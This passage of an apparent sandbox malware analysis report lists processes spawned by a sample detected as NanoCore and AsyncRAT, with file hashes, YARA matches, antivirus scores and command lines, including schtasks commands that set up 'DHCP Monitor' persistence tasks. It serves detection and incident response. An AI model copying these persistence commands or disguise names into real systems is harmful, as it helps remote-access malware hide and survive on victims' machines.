                                                  Path:C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe"
                                                  Imagebase:0x3c0000
                                                  File size:1082880 bytes
                                                  MD5 hash:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  General

                                                  Target ID:7
                                                  Start time:02:39:56
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\SYSTEM32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SYSTEM32.EXE"
                                                  Imagebase:0xda0000
                                                  File size:48640 bytes
                                                  MD5 hash:807474FC253612359DC697E331F01B43
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\SYSTEM32.EXE, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  General

                                                  Target ID:8
                                                  Start time:02:39:56
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                  Imagebase:0xbc0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 49%, Metadefender, Browse
                                                  • Detection: 81%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:9
                                                  Start time:02:39:57
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\WINDOWS.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\WINDOWS.EXE"
                                                  Imagebase:0x400000
                                                  File size:979968 bytes
                                                  MD5 hash:6278F321B0B9C85A0DF4E485A8DE7993
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  General

                                                  Target ID:11
                                                  Start time:02:39:59
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\._cache_WINDOWS.EXE"
                                                  Imagebase:0x5b0000
                                                  File size:208384 bytes
                                                  MD5 hash:568E6A074378730CEE0947C4C796372D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 88%, Metadefender, Browse
                                                  • Detection: 98%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:12
                                                  Start time:02:40:00
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                  Imagebase:0x5c0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:13
                                                  Start time:02:40:04
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
                                                  Imagebase:0xb70000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:14
                                                  Start time:02:40:05
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7f20f0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:15
                                                  Start time:02:40:05
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                  Imagebase:0xe80000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation:low

                                                  General

                                                  Target ID:16
                                                  Start time:02:40:06
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\._cache_WINDOWS.EXE 0
                                                  Imagebase:0xd70000
                                                  File size:208384 bytes
                                                  MD5 hash:568E6A074378730CEE0947C4C796372D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation:low

                                                  General

                                                  Target ID:17
                                                  Start time:02:40:07
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
                                                  Imagebase:0xb70000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:18
                                                  Start time:02:40:08
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7f20f0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:19
                                                  Start time:02:40:09
                                                  Start date:26/01/2022
                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
                                                  Imagebase:0xe20000
                                                  File size:208384 bytes
                                                  MD5 hash:568E6A074378730CEE0947C4C796372D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 88%, Metadefender, Browse
                                                  • Detection: 98%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:20
                                                  Start time:02:40:15
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Imagebase:0x870000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.379982346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.378011350.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.429244511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
